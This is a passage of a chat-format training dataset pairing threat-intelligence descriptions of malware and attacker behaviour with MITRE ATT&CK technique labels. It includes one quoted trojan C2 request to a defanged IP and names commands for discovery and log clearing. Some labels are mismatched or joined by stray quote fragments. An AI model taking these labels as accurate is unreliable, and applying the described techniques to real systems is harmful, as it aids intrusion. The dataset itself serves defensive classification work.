- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data"
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects password policy information with the command net accounts."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of performing screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "enumerates directories and scans for certain files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware performs COM hijacking by setting the path to itself to the HKCU\\Software\\Classes\\Folder\\shell\\open\\command key with a DelegateExecute parameter"
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird checks for the presence of Bitdefender security software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy's uninstaller has base64-encoded its variables."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors employed code that used `regsvr32` for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LOWBALL command and control occurs via HTTPS over port 443."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito runs \"tasklist\" to obtain running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command and control protocol's data stream can be encrypted with AES-CBC."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to encryption, the ransomware will check if the directory is in the root path and avoids the following files and directories"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SNUGRIDE communicates with its C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe Injection Technique To Increase Stealthiness After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilGrab has the capability to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of using its command and control protocol over port 443. However, Duqu is also capable of encapsulating its command protocol over standard application layer protocols. The Duqu command and control protocol implements many of the same features as TCP and is a reliable transport protocol."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team's research of potential victim organizations included the identification and collection of employee information."
- },
- {
- "role": "assistant",
- "content": "T1589.003 - Employee Names"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can retrieve the ARP cache from the local system by using \"GetIpNetTable\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During FunnyDream, the threat actors used netstat to discover network connections on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo has enumerated the local administrators group."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One persistence mechanism used by CozyCar is to register itself as a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144)."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage has the ability to capture the victim's screen."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using previously stolen credentials the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility. Downloaded utilities were copied to C:\\Windows\\SysWOW64\\. - The attacker performed host and network reconnaissance using built-in Windows commands. AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2). - This process was performed twice on the same domain controller, 10 hours apart. Between executions of Adfind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk. The attacker logged into a domain controller and copied instances of PSExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system. Using PsExec the attacker copied the process/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed. The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaRicto has used scheduled tasks to download backdoor tools."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess can use an encrypted channel for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox has the ability to list processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The agent control panel has three tabs that have interfaces that allow the actor to issue commands, as well as upload and download files to and from the agent"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can launch a remote shell to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that can obtain information about the local system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "achieves persistence by adding itself to the HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has been executed through convincing victims into clicking malicious links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses RC4 encryption over TCP to communicate with its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection"
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.006 - Unsecured Credentials: Group Policy Preferences', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sets a WH_CBT Windows hook to search for and capture files on the victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has installed ANTAK and ASPXSPY web shells."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya uses \"wevtutil\" to clear the Windows event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used Mimikatz to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472)."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes one of its files, 2.hwp, from the endpoint after establishing persistence."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used TCP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BendyBear has the ability to determine local time on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has created scheduled tasks to launch executables after a designated number of minutes have passed."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has the ability to overwrite its own file with random bites."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the anti-analysis checks are complete, the loader starts preparing the infected environment for the downloading of additional payloads. There are 3 download attempts (and thus 3 GET requests trailing by a different numeric ID), the payloads are downloaded subsequently to the user’s %temp% folder"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has exfiltrated data over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used VBS, VBE, and batch scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The document brought Talos a new gift - a new version of ROKRAT"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can use \"GetLocalTime\" and \"GetSystemTime\" to collect system time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can create a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the getInstalledAPP function to run ls -la /Applications to gather what applications are installed."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although Cobalt Strike has many capabilities beneficial to threat actors in ransomware attacks, it was mainly seen in LockBit 2.0 investigations acting as a command and control beacon, a method of lateral movement and a tool for downloading/executing files."
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dsquery can be used to gather information on user accounts within a domain."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates data using cookie values that are Base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to enumerate Registry keys, including \"KEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\\strDataDir\" to search for a bitcoin wallet."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 used another set of compromised credentials with membership to additional groups in the domain to RDP to other hosts"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POORAIM has been delivered through compromised sites acting as watering holes."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Password from successful login to the infected server: Whenever someone logs in a system infected with Linux/Ebury, the sshd daemon will save the password and send it to the exfiltration server. Password on successful login from the infected server: When someone uses the ssh client on an infected server, Linux/Ebury will intercept the password and sent it to its exfiltration server. Private key passphrase: When the ssh client on an infected server prompts the user for an private key passphrase, the passphrase will be sent to the remote exfiltration server. Unencrypted private key: When a private key is used to authenticate to a remote server, the unencrypted version is intercepted by the malware. Unlike passwords, it will not send the key to the exfiltration server. Instead, it will store it memory and wait for the operators to fetch the key with the Xcat command. Private keys added to the OpenSSH agent with ssh-add: The keys added to an OpenSSH agent are also intercepted by the malware. Both the unencrypted key itself and the passphrase typed by the user will be logged"
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The resulting HTTP POST request looks like the following: POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1 Host: 185.25.50[.]93 Content-Type: application/x-www-form-urlencoded Content-Length: 21 porg=44908AE0524f422d We have not seen a C2 server respond to our requests during our analysis, however, we do know how the Trojan will parse the C2’s response for specific data"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can enumerate processes on a target system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower has the ability to download payloads containing system commands to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Launch Agent on macOS."
- },
- {
- "role": "assistant",
